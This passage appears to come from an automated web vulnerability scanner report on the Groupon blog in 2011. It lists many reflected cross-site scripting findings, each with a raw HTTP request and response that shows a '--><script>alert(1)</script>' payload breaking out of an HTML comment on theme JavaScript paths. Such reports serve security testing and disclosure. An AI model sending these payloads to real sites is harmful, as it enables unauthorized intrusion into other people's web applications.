Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /blog/wp-content/themesd5fe2--><script>alert(1)</script>c831d509b7 /groublogpon/js/controls.js HTTP/1.1/blog/;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 404 Not Found/blog/xmlrpc.php/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... /blog/wp-content/themesd5fe2--><script>alert(1)</script>c831d509b7 /groublogpon/js/controls.js ) in 0.32773 seconds, on Aug 20th, 2011 at 11:58 am UTC. -->...[SNIP]...
1.16. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/controls.js [REST URL parameter 4]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/blog/wp-content/themes/groublogpon/js/controls.js
Issue detail
The value of REST URL parameter 4 is copied into an HTML comment. The payload d91d9--><script>alert(1)</script>d67a9e6aa0a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /blog/wp-content/themes/groublogpond91d9--><script>alert(1)</script>d67a9e6aa0a /js/controls.js HTTP/1.1/blog/;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 404 Not Found/blog/xmlrpc.php/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... /blog/wp-content/themes/groublogpond91d9--><script>alert(1)</script>d67a9e6aa0a /js/controls.js ) in 0.46392 seconds, on Aug 20th, 2011 at 11:58 am UTC. -->...[SNIP]...
1.17. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/controls.js [REST URL parameter 5]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/blog/wp-content/themes/groublogpon/js/controls.js
Issue detail
The value of REST URL parameter 5 is copied into an HTML comment. The payload bbdab--><script>alert(1)</script>86e3e197c7f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /blog/wp-content/themes/groublogpon/jsbbdab--><script>alert(1)</script>86e3e197c7f /controls.js HTTP/1.1/blog/;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 404 Not Found/blog/xmlrpc.php/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... /blog/wp-content/themes/groublogpon/jsbbdab--><script>alert(1)</script>86e3e197c7f /controls.js ) in 0.44403 seconds, on Aug 20th, 2011 at 11:58 am UTC. -->...[SNIP]...
1.18. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/controls.js [REST URL parameter 6]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/blog/wp-content/themes/groublogpon/js/controls.js
Issue detail
The value of REST URL parameter 6 is copied into an HTML comment. The payload a150e--><script>alert(1)</script>68b8aa45957 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /blog/wp-content/themes/groublogpon/js/controls.jsa150e--><script>alert(1)</script>68b8aa45957 HTTP/1.1/blog/;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 404 Not Found/blog/xmlrpc.php/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... /blog/wp-content/themes/groublogpon/js/controls.jsa150e--><script>alert(1)</script>68b8aa45957 ) in 0.37793 seconds, on Aug 20th, 2011 at 11:58 am UTC. -->...[SNIP]...
1.19. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/dragdrop.js [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/blog/wp-content/themes/groublogpon/js/dragdrop.js
Issue detail
The value of REST URL parameter 2 is copied into an HTML comment. The payload c75ab--><script>alert(1)</script>16f384841ba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /blog/wp-contentc75ab--><script>alert(1)</script>16f384841ba /themes/groublogpon/js/dragdrop.js HTTP/1.1/blog/;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 404 Not Found/blog/xmlrpc.php/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... /blog/wp-contentc75ab--><script>alert(1)</script>16f384841ba /themes/groublogpon/js/dragdrop.js ) in 0.37605 seconds, on Aug 20th, 2011 at 11:58 am UTC. -->...[SNIP]...
1.20. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/dragdrop.js [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/blog/wp-content/themes/groublogpon/js/dragdrop.js
Issue detail
The value of REST URL parameter 3 is copied into an HTML comment. The payload a961e--><script>alert(1)</script>9f83b1d2844 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /blog/wp-content/themesa961e--><script>alert(1)</script>9f83b1d2844 /groublogpon/js/dragdrop.js HTTP/1.1/blog/;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 404 Not Found/blog/xmlrpc.php/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... /blog/wp-content/themesa961e--><script>alert(1)</script>9f83b1d2844 /groublogpon/js/dragdrop.js ) in 0.37511 seconds, on Aug 20th, 2011 at 11:58 am UTC. -->...[SNIP]...
1.21. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/dragdrop.js [REST URL parameter 4]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/blog/wp-content/themes/groublogpon/js/dragdrop.js
Issue detail
The value of REST URL parameter 4 is copied into an HTML comment. The payload 42df7--><script>alert(1)</script>6df938ad9e4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /blog/wp-content/themes/groublogpon42df7--><script>alert(1)</script>6df938ad9e4 /js/dragdrop.js HTTP/1.1/blog/;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 404 Not Found/blog/xmlrpc.php/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... /blog/wp-content/themes/groublogpon42df7--><script>alert(1)</script>6df938ad9e4 /js/dragdrop.js ) in 0.33357 seconds, on Aug 20th, 2011 at 11:58 am UTC. -->...[SNIP]...
1.22. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/dragdrop.js [REST URL parameter 5]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/blog/wp-content/themes/groublogpon/js/dragdrop.js
Issue detail
The value of REST URL parameter 5 is copied into an HTML comment. The payload 83571--><script>alert(1)</script>8c9d94b4de1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /blog/wp-content/themes/groublogpon/js83571--><script>alert(1)</script>8c9d94b4de1 /dragdrop.js HTTP/1.1/blog/;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 404 Not Found/blog/xmlrpc.php/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... /blog/wp-content/themes/groublogpon/js83571--><script>alert(1)</script>8c9d94b4de1 /dragdrop.js ) in 0.32268 seconds, on Aug 20th, 2011 at 11:58 am UTC. -->...[SNIP]...
1.23. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/dragdrop.js [REST URL parameter 6]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/blog/wp-content/themes/groublogpon/js/dragdrop.js
Issue detail
The value of REST URL parameter 6 is copied into an HTML comment. The payload 6fad7--><script>alert(1)</script>043636aa07b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /blog/wp-content/themes/groublogpon/js/dragdrop.js6fad7--><script>alert(1)</script>043636aa07b HTTP/1.1/blog/;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 404 Not Found/blog/xmlrpc.php/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... /blog/wp-content/themes/groublogpon/js/dragdrop.js6fad7--><script>alert(1)</script>043636aa07b ) in 0.53918 seconds, on Aug 20th, 2011 at 11:58 am UTC. -->...[SNIP]...
1.24. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/slider.js [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/blog/wp-content/themes/groublogpon/js/slider.js
Issue detail
The value of REST URL parameter 2 is copied into an HTML comment. The payload bb08c--><script>alert(1)</script>05a7140da98 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /blog/wp-contentbb08c--><script>alert(1)</script>05a7140da98 /themes/groublogpon/js/slider.js HTTP/1.1/blog/;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 404 Not Found/blog/xmlrpc.php/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... /blog/wp-contentbb08c--><script>alert(1)</script>05a7140da98 /themes/groublogpon/js/slider.js ) in 0.35467 seconds, on Aug 20th, 2011 at 11:58 am UTC. -->...[SNIP]...
1.25. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/slider.js [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/blog/wp-content/themes/groublogpon/js/slider.js
Issue detail
The value of REST URL parameter 3 is copied into an HTML comment. The payload 6f226--><script>alert(1)</script>3366f026cc4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /blog/wp-content/themes6f226--><script>alert(1)</script>3366f026cc4 /groublogpon/js/slider.js HTTP/1.1/blog/;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 404 Not Found/blog/xmlrpc.php/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... /blog/wp-content/themes6f226--><script>alert(1)</script>3366f026cc4 /groublogpon/js/slider.js ) in 0.41047 seconds, on Aug 20th, 2011 at 11:58 am UTC. -->...[SNIP]...
1.26. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/slider.js [REST URL parameter 4]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/blog/wp-content/themes/groublogpon/js/slider.js
Issue detail
The value of REST URL parameter 4 is copied into an HTML comment. The payload a64ac--><script>alert(1)</script>e0d4e624964 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /blog/wp-content/themes/groublogpona64ac--><script>alert(1)</script>e0d4e624964 /js/slider.js HTTP/1.1/blog/;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 404 Not Found/blog/xmlrpc.php/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... /blog/wp-content/themes/groublogpona64ac--><script>alert(1)</script>e0d4e624964 /js/slider.js ) in 0.31297 seconds, on Aug 20th, 2011 at 11:58 am UTC. -->...[SNIP]...
1.27. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/slider.js [REST URL parameter 5]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/blog/wp-content/themes/groublogpon/js/slider.js
Issue detail
The value of REST URL parameter 5 is copied into an HTML comment. The payload beada--><script>alert(1)</script>0e897a0323e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /blog/wp-content/themes/groublogpon/jsbeada--><script>alert(1)</script>0e897a0323e /slider.js HTTP/1.1/blog/;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 404 Not Found/blog/xmlrpc.php/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... /blog/wp-content/themes/groublogpon/jsbeada--><script>alert(1)</script>0e897a0323e /slider.js ) in 0.46094 seconds, on Aug 20th, 2011 at 11:58 am UTC. -->...[SNIP]...
1.28. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/slider.js [REST URL parameter 6]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/blog/wp-content/themes/groublogpon/js/slider.js
Issue detail
The value of REST URL parameter 6 is copied into an HTML comment. The payload 98145--><script>alert(1)</script>778802fe1fe was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /blog/wp-content/themes/groublogpon/js/slider.js98145--><script>alert(1)</script>778802fe1fe HTTP/1.1/blog/;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 404 Not Found/blog/xmlrpc.php/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... /blog/wp-content/themes/groublogpon/js/slider.js98145--><script>alert(1)</script>778802fe1fe ) in 0.45090 seconds, on Aug 20th, 2011 at 11:58 am UTC. -->...[SNIP]...
1.29. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/sound.js [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/blog/wp-content/themes/groublogpon/js/sound.js
Issue detail
The value of REST URL parameter 2 is copied into an HTML comment. The payload aa475--><script>alert(1)</script>d4bda2f82db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /blog/wp-contentaa475--><script>alert(1)</script>d4bda2f82db /themes/groublogpon/js/sound.js HTTP/1.1/blog/;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 404 Not Found/blog/xmlrpc.php/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... /blog/wp-contentaa475--><script>alert(1)</script>d4bda2f82db /themes/groublogpon/js/sound.js ) in 0.32623 seconds, on Aug 20th, 2011 at 11:58 am UTC. -->...[SNIP]...
1.30. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/sound.js [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/blog/wp-content/themes/groublogpon/js/sound.js
Issue detail
The value of REST URL parameter 3 is copied into an HTML comment. The payload ffbfc--><script>alert(1)</script>cfae934e149 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /blog/wp-content/themesffbfc--><script>alert(1)</script>cfae934e149 /groublogpon/js/sound.js HTTP/1.1/blog/;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 404 Not Found/blog/xmlrpc.php/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... /blog/wp-content/themesffbfc--><script>alert(1)</script>cfae934e149 /groublogpon/js/sound.js ) in 0.54305 seconds, on Aug 20th, 2011 at 11:58 am UTC. -->...[SNIP]...
1.31. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/sound.js [REST URL parameter 4]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/blog/wp-content/themes/groublogpon/js/sound.js
Issue detail
The value of REST URL parameter 4 is copied into an HTML comment. The payload e874c--><script>alert(1)</script>10b8491a9c4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /blog/wp-content/themes/groublogpone874c--><script>alert(1)</script>10b8491a9c4 /js/sound.js HTTP/1.1/blog/;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 404 Not Found/blog/xmlrpc.php/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... /blog/wp-content/themes/groublogpone874c--><script>alert(1)</script>10b8491a9c4 /js/sound.js ) in 0.30104 seconds, on Aug 20th, 2011 at 11:58 am UTC. -->...[SNIP]...
1.32. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/sound.js [REST URL parameter 5]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/blog/wp-content/themes/groublogpon/js/sound.js
Issue detail
The value of REST URL parameter 5 is copied into an HTML comment. The payload d7466--><script>alert(1)</script>b48a2788bb4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /blog/wp-content/themes/groublogpon/jsd7466--><script>alert(1)</script>b48a2788bb4 /sound.js HTTP/1.1/blog/;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 404 Not Found/blog/xmlrpc.php/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... /blog/wp-content/themes/groublogpon/jsd7466--><script>alert(1)</script>b48a2788bb4 /sound.js ) in 0.40548 seconds, on Aug 20th, 2011 at 11:58 am UTC. -->...[SNIP]...
1.33. http://www.groupon.com/blog/wp-content/themes/groublogpon/js/sound.js [REST URL parameter 6]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/blog/wp-content/themes/groublogpon/js/sound.js
Issue detail
